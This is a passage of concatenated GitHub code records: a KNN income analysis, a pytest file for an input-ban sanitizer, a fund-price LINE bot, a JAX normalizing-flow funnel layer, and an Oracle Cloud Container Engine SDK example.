ppt.ylabel(\"Income (percents)\")\r\n ppt.show()\r\n\r\n\r\ndef createSingleGraph(ax, x, y, xlabel, ylabel, title):\r\n ax.plot(x, y)\r\n ax.plot(x, y)\r\n ax.set_xlabel(xlabel)\r\n ax.set_ylabel(ylabel)\r\n ax.set_title(title, loc='right')\r\n\r\n\r\ndef indexing(filename) -> dict:\r\n file = open(filename, 'r')\r\n result = dict()\r\n index = 0\r\n for line in file:\r\n result[line.rstrip('\\n')] = index\r\n index += 1\r\n return result\r\n\r\n\r\n\r\n\r\ndef replaceTextualData(data, filename=None) -> pd.DataFrame:\r\n clone = copy.deepcopy(data)\r\n\r\n columns = clone.columns\r\n if \"education\" in columns:\r\n education = indexing(\"./data/education.txt\")\r\n clone[\"education\"] = [education[item] for item in clone[\"education\"]]\r\n\r\n if \"marital-status\" in columns:\r\n marital_status = indexing(\"./data/marital-status.txt\")\r\n clone[\"marital-status\"] = [marital_status[item] for item in clone[\"marital-status\"]]\r\n\r\n if \"native-country\" in columns:\r\n 
native_country = indexing(\"./data/native-country.txt\")\r\n clone[\"native-country\"] = [native_country[item] for item in clone[\"native-country\"]]\r\n\r\n if \"occupation\" in columns:\r\n occupation = indexing(\"./data/occupation.txt\")\r\n clone[\"occupation\"] = [occupation[item] for item in clone[\"occupation\"]]\r\n\r\n if \"race\" in columns:\r\n race = indexing(\"./data/race.txt\")\r\n clone[\"race\"] = [race[item] for item in clone[\"race\"]]\r\n\r\n if \"relationship\" in columns:\r\n relationship = indexing(\"./data/relationship.txt\")\r\n clone[\"relationship\"] = [relationship[item] for item in clone[\"relationship\"]]\r\n\r\n if \"workclass\" in columns:\r\n workclass = indexing(\"./data/workclass.txt\")\r\n clone[\"workclass\"] = [workclass[item] for item in clone[\"workclass\"]]\r\n\r\n return clone\r\n\r\n\r\ndef createHistogram(data):\r\n data.hist()\r\n ppt.show()\r\n\r\n\r\ndef excludeColumnsAndCreateCorrTable(data):\r\n data = data.drop(columns=['marital-status', 'educational-num', 'fnlwgt', 'capital-gain', 'capital-loss'])\r\n return data\r\n\r\n\r\ndef arrayToString(array):\r\n result = \"\"\r\n size = len(array)\r\n for index in range(size - 1):\r\n result += str(array[index]) + \", \"\r\n result += str(array[size - 1])\r\n return result\r\n\r\n\r\n# модель классификации. В качестве алгоритма классификации выбран алгоритм KNN \r\ndef kNN(data, max_number_of_neighbours=None):\r\n # splitting data\r\n textual_data = data.select_dtypes(include='object')\r\n numeric_data = data.select_dtypes(exclude='object')\r\n\r\n textual_data = pd.get_dummies(textual_data)\r\n\r\n\r\n # remove income column from numeric data and scaling data\r\n income = numeric_data['income']\r\n factors = numeric_data.drop(columns='income')\r\n scaler = preprocessing.StandardScaler()\r\n std_factors = pd.DataFrame(scaler.fit_transform(factors))\r\n std_factors.columns = factors.columns\r\n\r\n # adding classification properties and splitting data to train and test\r\n train_data = pd.concat([std_factors, textual_data], axis=1)\r\n train, test, train_result, test_result = train_test_split(train_data, income, test_size=0.3,\r\n random_state=1)\r\n\r\n # learn model, predict values and record prediction accuracy\r\n predicted = learnModel(train, train_result, test)\r\n\r\n if max_number_of_neighbours is not None:\r\n mean_acc = np.zeros((max_number_of_neighbours - 1))\r\n std_acc = np.zeros((max_number_of_neighbours - 1))\r\n\r\n for neighbours_count in range(1, max_number_of_neighbours):\r\n predicted = learnModel(train, train_result, test, neighbours_count)\r\n mean_acc[neighbours_count - 1] = metrics.accuracy_score(test_result, predicted)\r\n std_acc[neighbours_count - 1] = np.std(predicted == test_result) / np.sqrt(predicted.shape[0])\r\n\r\n # create plot for statistics\r\n ppt.plot(range(1, max_number_of_neighbours), mean_acc, marker='o')\r\n ppt.legend(('Accuracy '))\r\n ppt.ylabel('Accuracy ')\r\n ppt.xlabel('Number of Neighbors (K)')\r\n ppt.tight_layout()\r\n ppt.show()\r\n\r\n\r\ndef learnModel(train, train_result, test, number_of_neighbours=5):\r\n neigh = KNeighborsClassifier(n_neighbors=number_of_neighbours).fit(train, train_result)\r\n return neigh.predict(test)\r\n\r\n\r\ndata = pd.read_csv('adult.csv')\r\nprint(data.head())\r\nprint('------------------------------------ АНАЛИЗ ------------------------------------')\r\nprint('Количество ячеек, содержащих неизвестные значения (знак 
?)')\r\nprint(unknownCount(data))\r\ncreateHistogram(data)\r\nclearData(data)\r\nanalyzeIncomeByEducationAndHoursPerWeek(data)\r\nanalyzeIncomeByGender(data)\r\nclone = replaceTextualData(data)\r\ndata = excludeColumnsAndCreateCorrTable(data)\r\nkNN(data, 25)\r\n", "repo_name": "NinjaCaratist/metrology_lab45", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7979, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.DataFrame", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 78, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 110, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 109, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "pandas.get_dummies", "line_number": 169, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 175, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 175, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 176, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 180, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 189, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 193, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 193, "usage_type": "name"}, {"api_name": "numpy.std", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 199, "usage_type": "call"}, {"api_name": 
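Two details in the adult-income record above are worth flagging: DataFrame.replace is not in-place by default, so clearData discards its result and the '?' cells survive, and ppt.legend(('Accuracy ')) passes a bare string, which matplotlib then iterates character by character. A corrected sketch of both fragments, under the same column names as the record:

```python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt

def clear_data(data: pd.DataFrame) -> pd.DataFrame:
    # DataFrame.replace returns a new frame unless inplace=True is given,
    # so the result must be kept; the record above drops it.
    data["income"] = (data["income"] == ">50K").astype(int)
    return data.replace("?", np.nan)

def plot_accuracy(mean_acc: np.ndarray, max_k: int) -> None:
    plt.plot(range(1, max_k), mean_acc, marker="o")
    # legend() expects a sequence of labels; a bare string would be
    # unpacked into single characters.
    plt.legend(["Accuracy"])
    plt.xlabel("Number of Neighbors (K)")
    plt.ylabel("Accuracy")
    plt.tight_layout()
    plt.show()
```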
"matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 206, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 210, "usage_type": "call"}]} +{"seq_id": "36373745599", "text": "# External Libraries\nimport pytest\n\n# VerdanTech Source\nfrom src.utils.sanitizers.basic.ban import BanSpec, BanSpecConfig, BanSpecParams\n\npytestmark = [pytest.mark.unit]\n\n\nclass TestBanSpec:\n # ======================================\n # BanSpec._sanitize() tests\n # ======================================\n\n @pytest.mark.parametrize(\n [\n \"input_data\",\n \"params\",\n \"case_sensitive\",\n \"expected_output\",\n ],\n [\n # Test case: float not in banned_inputs returns true\n (0.5, BanSpecParams(banned_inputs=[0.1, 0.2, 0.3]), False, True),\n # Test case: float in banned_inputs returns false\n (0.5, BanSpecParams(banned_inputs=[0.1, 0.2, 0.5]), False, False),\n # Test case: str not in banned_inputs returns true\n (\"str\", BanSpecParams(banned_inputs=[\"str1\", \"str2\"]), False, True),\n # Test case: str in banned_inputs returns false\n (\"str\", BanSpecParams(banned_inputs=[\"str1\", \"str\"]), False, False),\n # Test case: str in banned_inputs\n # with case_sensitive = True\n # returns True\n (\"sTr\", BanSpecParams(banned_inputs=[\"str\"]), True, True),\n # Test case: str in normalized(banned_inputs)\n # with case_sensitive = False\n # returns false\n (\"sTr\", BanSpecParams(banned_inputs=[\"str\"]), False, False),\n ],\n )\n def test_ban_spec_minimum_bound(\n self,\n input_data: str,\n params: BanSpecParams,\n case_sensitive: bool,\n expected_output: bool,\n ):\n \"\"\"\n Ensure the inner sanitization logic rejects inputs with lengths\n greater than params.min.\n\n Args:\n input_data (Real): the input to test validation on.\n params (LengthSpecParams): the min and max values\n to use for validation.\n case_sensitive (bool): the value of BanSpecConfig.case_sensitive\n to set on the BanSpec under test.\n expected_output (bool): the expected result of the validation.\n \"\"\"\n config = BanSpecConfig(\n params=params, error_message=\"\", case_sensitive=case_sensitive\n )\n spec = BanSpec(config=config)\n assert spec._sanitize(input_data=input_data) == expected_output\n", "repo_name": "nathanielarking/VerdanTech", "sub_path": "tests/utils/sanitizers/basic/ban_test.py", "file_name": "ban_test.py", "file_ext": "py", "file_size_in_byte": 2369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pytest.mark", "line_number": 7, "usage_type": "attribute"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 44, "usage_type": "name"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecConfig", "line_number": 60, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpec", "line_number": 63, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 15, "usage_type": "call"}, {"api_name": 
"pytest.mark", "line_number": 15, "usage_type": "attribute"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 24, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 26, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 28, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 30, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 34, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "33089508279", "text": "import requests\nimport json\nimport re\nimport time\n\n# fund codes array As target data\nfund_codes = [\n \"161725\",\n \"320007\",\n \"260108\",\n \"001938\",\n \"003096\",\n \"006408\",\n \"003834\",\n \"001838\",\n \"519674\",\n]\n\n# line channel access token\naccess_token = ''\n\n# message for send to line\nmessage = \"\"\n\nfor code in fund_codes:\n # request URL from https://fund.eastmoney.com/\n fund_url = \"http://fundgz.1234567.com.cn/js/%s.js\" % code\n # http request header\n headers = {\n 'content-type':\n 'application/json',\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36'\n }\n # send request\n r = requests.get(url=fund_url, headers=headers)\n # returned body\n content = r.text\n # regexp\n pattern = r'^jsonpgz\\((.*)\\)'\n # format response\n search = re.findall(pattern, content)\n # get fund data from array\n for i in search:\n data = json.loads(i)\n if float(data['gszzl']) > 0:\n message += (\"{}: {}%⬆️\\n\".format(data['name'], data['gszzl']))\n elif float(data['gszzl']) < 0:\n message += (\"{}: {}%⬇️\\n\".format(data['name'], data['gszzl']))\n else:\n message += (\"{}: {}%\\n\".format(data['name'], data['gszzl']))\n\n# line messaging api url\nline_url = 'https://api.line.me/v2/bot/message/broadcast'\n# line request header\nline_headers = {\n 'Authorization': 'Bearer ' + access_token,\n 'Content-Type': 'application/json'\n}\n\n# define message in json format\nmessage_list = {'messages': [{'type': 'text', 'text': message[:-1]}]}\n\n# encode to json\nmessage_data = json.dumps(message_list)\n# post message request\nresponse = requests.post(url=line_url, headers=line_headers, data=message_data)\n\nprint(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\nprint(response)\n", "repo_name": "peepa857/wechat-fund", "sub_path": "linebot.py", "file_name": "linebot.py", "file_ext": "py", "file_size_in_byte": 1879, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 36, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 45, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 67, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 69, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "19314190526", "text": "import distrax\nimport haiku as hk\nfrom chex import Array\nfrom jax import numpy as jnp\n\nfrom surjectors.bijectors.masked_autoregressive import MaskedAutoregressive\nfrom surjectors.surjectors.funnel import Funnel\nfrom surjectors.util 
import unstack\n\n\nclass AffineMaskedAutoregressiveInferenceFunnel(Funnel):\n \"\"\"\n Inference funnel layer using masked affine autoregression\n \"\"\"\n\n def __init__(self, n_keep, decoder, conditioner):\n super().__init__(\n n_keep, decoder, conditioner, None, \"inference_surjector\"\n )\n\n def _inner_bijector(self):\n def _bijector_fn(params: Array):\n shift, log_scale = unstack(params, axis=-1)\n return distrax.ScalarAffine(shift, jnp.exp(log_scale))\n\n return MaskedAutoregressive(self._conditioner, _bijector_fn)\n\n def inverse_and_likelihood_contribution(self, y, x=None, **kwargs):\n y_plus, y_minus = y[..., : self.n_keep], y[..., self.n_keep :]\n\n y_cond = y_minus\n if x is not None:\n y_cond = jnp.concatenate([y_cond, x], axis=-1)\n z, jac_det = self._inner_bijector().inverse_and_log_det(y_plus, y_cond)\n\n z_condition = z\n if x is not None:\n z_condition = jnp.concatenate([z, x], axis=-1)\n lc = self.decoder(z_condition).log_prob(y_minus)\n\n return z, lc + jac_det\n\n def forward_and_likelihood_contribution(self, z, x=None, **kwargs):\n z_condition = z\n if x is not None:\n z_condition = jnp.concatenate([z, x], axis=-1)\n y_minus, jac_det = self.decoder(z_condition).sample_and_log_prob(\n seed=hk.next_rng_key()\n )\n\n y_cond = y_minus\n if x is not None:\n y_cond = jnp.concatenate([y_cond, x], axis=-1) \n y_plus, lc = self._inner_bijector().forward_and_log_det(z, y_cond)\n\n y = jnp.concatenate([y_plus, y_minus])\n return y, lc + jac_det\n\n def forward(self, z, x=None):\n y, _ = self.forward_and_likelihood_contribution(z, x)\n return y\n", "repo_name": "dirmeier/ssnl", "sub_path": "surjectors/surjectors/surjectors/affine_masked_autoregressive_inference_funnel.py", "file_name": "affine_masked_autoregressive_inference_funnel.py", "file_ext": "py", "file_size_in_byte": 2033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "surjectors.surjectors.funnel.Funnel", "line_number": 11, "usage_type": "name"}, {"api_name": "chex.Array", "line_number": 22, "usage_type": "name"}, {"api_name": "surjectors.util.unstack", "line_number": 23, "usage_type": "call"}, {"api_name": "distrax.ScalarAffine", "line_number": 24, "usage_type": "call"}, {"api_name": "jax.numpy.exp", "line_number": 24, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 24, "usage_type": "name"}, {"api_name": "surjectors.bijectors.masked_autoregressive.MaskedAutoregressive", "line_number": 26, "usage_type": "call"}, {"api_name": "jax.numpy.concatenate", "line_number": 33, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 33, "usage_type": "name"}, {"api_name": "jax.numpy.concatenate", "line_number": 38, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 38, "usage_type": "name"}, {"api_name": "jax.numpy.concatenate", "line_number": 46, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 46, "usage_type": "name"}, {"api_name": "haiku.next_rng_key", "line_number": 48, "usage_type": "call"}, {"api_name": "jax.numpy.concatenate", "line_number": 53, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 53, "usage_type": "name"}, {"api_name": "jax.numpy.concatenate", "line_number": 56, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 56, "usage_type": "name"}]} +{"seq_id": "31574271629", "text": "from __future__ import print_function\nimport oci\n\n\n# This script demonstrates some of the Container Engine operations.\n# Please review the documentation for more 
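The funnel record above builds its inner transform from distrax.ScalarAffine inside a masked-autoregressive bijector, and its likelihood contributions come from the bijector's log-determinants. A small sketch of just the elementwise affine piece and its log-determinant bookkeeping, assuming distrax's standard forward_and_log_det/inverse_and_log_det bijector interface:

```python
import distrax
import jax.numpy as jnp

# Parameters playing the role of the conditioner outputs in the record.
shift = jnp.array([0.5, -1.0])
log_scale = jnp.array([0.1, 0.3])
bijector = distrax.ScalarAffine(shift, jnp.exp(log_scale))

x = jnp.array([1.0, 2.0])
y, fwd_ldj = bijector.forward_and_log_det(x)
x_back, inv_ldj = bijector.inverse_and_log_det(y)

assert jnp.allclose(x, x_back)          # inverse really inverts forward
assert jnp.allclose(fwd_ldj, -inv_ldj)  # log-dets are negatives of each other
```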
information about\n# how Container Engine works, including permissions needed.\n#\n# https://docs.cloud.oracle.com/Content/ContEng/Concepts/contengoverview.htm\n\n# Note: Exception handling is rudimentary and would need to be expanded for use in\n# production. Please be aware resources may need to be cleaned up manually\n# if an exception occures.\n\n# Load the default configuration\nconfig = oci.config.from_file()\n\n# This is the root compartment. You can use another compartment in your tenancy.\ncompartment_id = config[\"tenancy\"]\n\nprint(\"Compartment id: {}\".format(compartment_id))\n\n#############################\n# Container Engine operations\n#############################\n\n\ndef create_cluster(ce_client, vcn):\n \"\"\"\n create_cluster\n\n This function demonstrates the process of creating a cluster. The cidrs\n and other values are just for demonstration purposes.\n \"\"\"\n success = True\n kubernetes_network_config = oci.container_engine.models.KubernetesNetworkConfig(pods_cidr=\"10.244.0.0/16\",\n services_cidr=\"10.96.0.0/16\")\n\n cluster_create_options = oci.container_engine.models.ClusterCreateOptions(service_lb_subnet_ids=vcn['lb_subnets'],\n kubernetes_network_config=kubernetes_network_config)\n\n cluster_details = oci.container_engine.models.CreateClusterDetails(name=\"PythonSDK_cluster1\",\n compartment_id=compartment_id,\n vcn_id=vcn['id'],\n kubernetes_version=get_kubernetes_version(ce_client),\n options=cluster_create_options)\n\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.create_cluster_and_wait_for_state(cluster_details,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED,\n oci.container_engine.models.WorkRequest.STATUS_FAILED])\n\n # response.data is a WorkRequestSummary\n # gather the created resources from the work request\n resources = {}\n for resource in response.data.resources:\n print(\"{}: {}\".format(resource.entity_type, resource.identifier))\n resources[resource.entity_type] = resource.identifier\n\n # If the workrequest failed, get the work request errors.\n if response.data.status == oci.container_engine.models.WorkRequest.STATUS_FAILED:\n get_work_request_errors(ce_client, compartment_id, response.data.id)\n success = False\n else:\n print(\"Create cluster succeed\")\n\n # Get the work request logs\n print_header(\"Work request logs:\")\n response = ce_client.list_work_request_logs(compartment_id, response.data.id)\n print(response.data)\n\n return success, resources\n\n\ndef update_cluster(ce_client, cluster_id):\n \"\"\"\n update_cluster\n\n Currently there are two items you can update on the cluster the name and the kubernetes version.\n This function demonstrates updating the name. 
Updating the kubernetes version works in\n a similar fashion.\n \"\"\"\n\n update_cluster_details = oci.container_engine.models.UpdateClusterDetails(name=\"PythonSDK_cluster_1\")\n\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.update_cluster_and_wait_for_state(cluster_id,\n update_cluster_details,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED,\n oci.container_engine.models.WorkRequest.STATUS_FAILED])\n\n # If the workrequest failed, get the work request errors.\n if response.data.status == oci.container_engine.models.WorkRequest.STATUS_FAILED:\n get_work_request_errors(ce_client, compartment_id, response.data.id)\n else:\n print(\"Update cluster succeeded\")\n\n return\n\n\ndef delete_cluster(ce_client, cluster_id):\n \"\"\"\n delete_cluster\n\n Delete the clusted associated with the cluster_id passed in\n \"\"\"\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.delete_cluster_and_wait_for_state(cluster_id,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED])\n\n if response.status == 200:\n print(\"Cluster deleted successfully\")\n else:\n print(\"Recieved '{}' when attempting to delete the cluster\".format(response.status))\n\n return\n\n\ndef get_kubeconfig(ce_client, cluster_id):\n \"\"\"\n get_kubeconfig\n\n Given a cluster id, retrieve the kubconfig.\n \"\"\"\n\n response = ce_client.create_kubeconfig(cluster_id)\n\n # response.data.text contains the contents of the kubeconfig file which\n # can be writen to a file using code like the following snippet.\n \"\"\"\n with open('kubconfig.txt', 'w') as f:\n f.write(response.data.text)\n \"\"\"\n if response.data.text:\n print(\"kubeconfig retrieved\")\n else:\n print(\"Error retrieving the kubeconfig\")\n\n return\n\n\ndef create_node_pool(ce_client, ads, cluster_id, subnet):\n \"\"\"\n create_node_pool\n\n Creates a node pool inside of a cluser\n \"\"\"\n node_pool_placement_configs_details = []\n for ad in ads:\n node_pool_placement_configs_details.append(oci.container_engine.models.NodePoolPlacementConfigDetails(\n availability_domain=ad,\n subnet_id=subnet)\n )\n\n create_node_pool_node_config_details = oci.container_engine.models.CreateNodePoolNodeConfigDetails(\n size=len(ads),\n placement_configs=node_pool_placement_configs_details\n )\n\n success = True\n node_pool_create_details = oci.container_engine.models.CreateNodePoolDetails(compartment_id=compartment_id,\n cluster_id=cluster_id,\n name=\"PythonSDK_nodepool1\",\n kubernetes_version=get_kubernetes_version(ce_client),\n node_image_name=\"Oracle-Linux-7.4\",\n node_shape=\"VM.Standard2.1\",\n initial_node_labels=[{\"nodes\": \"Example Nodes\"}],\n node_config_details=create_node_pool_node_config_details)\n\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.create_node_pool_and_wait_for_state(node_pool_create_details,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED,\n oci.container_engine.models.WorkRequest.STATUS_FAILED])\n\n # gather the created resources from the work request\n resources = {}\n for resource in response.data.resources:\n resources[resource.entity_type] = resource.identifier\n\n # If the workrequest failed, get the work request errors.\n if response.data.status == oci.container_engine.models.WorkRequest.STATUS_FAILED:\n 
get_work_request_errors(ce_client, compartment_id, response.data.id)\n success = False\n else:\n print(\"Create node pool succeeded\")\n\n return success, resources\n\n\ndef update_node_pool(ce_client, node_pool_id):\n \"\"\"\n update_node_pool\n\n Currently there are a number of features that can be updated in the node pool.\n This example will only update the name. Please see the documentation for\n the other features which can be updated\n \"\"\"\n\n update_node_pool_details = oci.container_engine.models.UpdateNodePoolDetails(name=\"PythonSDK_noodpool_1\")\n\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.update_node_pool_and_wait_for_state(node_pool_id,\n update_node_pool_details,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED,\n oci.container_engine.models.WorkRequest.STATUS_FAILED])\n\n if response.data.status == oci.container_engine.models.WorkRequest.STATUS_FAILED:\n get_work_request_errors(ce_client, compartment_id, response.data.id)\n else:\n print(\"Update node pool succeeded\")\n\n return\n\n\ndef delete_node_pool(ce_client, node_pool_id):\n \"\"\"\n delete_node_pool\n\n Deletes the specified node pool. The cluster is not deleted.\n \"\"\"\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.delete_node_pool_and_wait_for_state(node_pool_id,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED])\n\n if response.status == 200:\n print(\"Node pool deleted successfully\")\n else:\n print(\"Recieved '{}' when attempting to delete the node pool\".format(response.status))\n\n return\n\n\ndef get_kubernetes_version(ce_client):\n \"\"\"\n get_kubernetes_version\n\n Get the supported kubernetes versions from the service. 
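The container-engine record repeats one pattern throughout: call a composite *_and_wait_for_state operation, then branch on the terminal work-request status and collect the created resources. A condensed sketch of that pattern for cluster creation, reusing the client and model names from the record; the details object is assumed to be built as shown there:

```python
import oci

config = oci.config.from_file()
ce_client = oci.container_engine.ContainerEngineClient(config)
composite = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)

def run_and_check(details):
    # `details` is a CreateClusterDetails built as in the record above.
    response = composite.create_cluster_and_wait_for_state(
        details,
        wait_for_states=[
            oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED,
            oci.container_engine.models.WorkRequest.STATUS_FAILED,
        ],
    )
    if response.data.status == oci.container_engine.models.WorkRequest.STATUS_FAILED:
        raise RuntimeError("work request {} failed".format(response.data.id))
    # Map entity types to OCIDs, as the record does for its cleanup phase.
    return {r.entity_type: r.identifier for r in response.data.resources}
```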
There are multiple\n versions supported but for the example we will just use the last one in the\n list.\n \"\"\"\n response = ce_client.get_cluster_options(cluster_option_id=\"all\")\n\n versions = response.data.kubernetes_versions\n if len(versions) > 0:\n kubernetes_version = versions[-1]\n else:\n raise RuntimeError(\"No supported Kubernetes versions found\")\n\n return kubernetes_version\n\n################\n# VCN operations\n################\n\n\ndef create_vcn(vn_client, ads, number_of_worker_subnets=1, number_of_lb_subnets=1):\n \"\"\"\n create_vcn\n\n See https://docs.cloud.oracle.com/Content/ContEng/Concepts/contengnetworkconfig.htm#VCN\n for details on how the VCN should be configured for container engine.\n\n This function will build a Virtual Cloud Network based on the example network resource configuration:\n https://docs.cloud.oracle.com/Content/ContEng/Concepts/contengnetworkconfigexample.htm\n\n The function returns a dictionary containing the id of the VCN created, a list of worker subnets and\n a list of load balancer subnets\n \"\"\"\n\n vcn = {'id': None,\n 'worker_subnets': [],\n 'lb_subnets': []}\n\n subnet_template = \"10.0.{}.0/24\"\n\n vn_composite_ops = oci.core.VirtualNetworkClientCompositeOperations(vn_client)\n\n vcn_details = oci.core.models.CreateVcnDetails(cidr_block='10.0.0.0/16',\n display_name='PythonSDKContainerEngineExampleVcn',\n dns_label='cevcn',\n compartment_id=compartment_id,\n )\n\n result = vn_composite_ops.create_vcn_and_wait_for_state(vcn_details,\n wait_for_states=[oci.core.models.Vcn.LIFECYCLE_STATE_AVAILABLE])\n\n vcn['id'] = result.data.id\n print(\"VCN Id: {}\".format(vcn['id']))\n\n # Setup the gateway\n gateway_details = oci.core.models.CreateInternetGatewayDetails(compartment_id=compartment_id,\n display_name='PythonCE-gateway-0',\n is_enabled=True,\n vcn_id=vcn['id'])\n\n result = vn_composite_ops.create_internet_gateway_and_wait_for_state(gateway_details,\n wait_for_states=[oci.core.models.InternetGateway.LIFECYCLE_STATE_AVAILABLE])\n\n gateway_id = result.data.id\n print('Gateway Id: {}'.format(gateway_id))\n\n # Setup the route table\n route_table_rule = oci.core.models.RouteRule(cidr_block=None,\n destination='0.0.0.0/0',\n destination_type='CIDR_BLOCK',\n network_entity_id=gateway_id)\n\n route_table_details = oci.core.models.CreateRouteTableDetails(compartment_id=compartment_id,\n display_name='PythonCE-routetable-0',\n route_rules=[route_table_rule],\n vcn_id=vcn['id'])\n\n result = vn_composite_ops.create_route_table_and_wait_for_state(route_table_details,\n wait_for_states=[oci.core.models.RouteTable.LIFECYCLE_STATE_AVAILABLE])\n\n route_table_id = result.data.id\n print('Route Table Id: {}'.format(route_table_id))\n\n ################\n # Security Lists and Security Rules\n # More information on the security list configuration for container engine can be found here:\n # 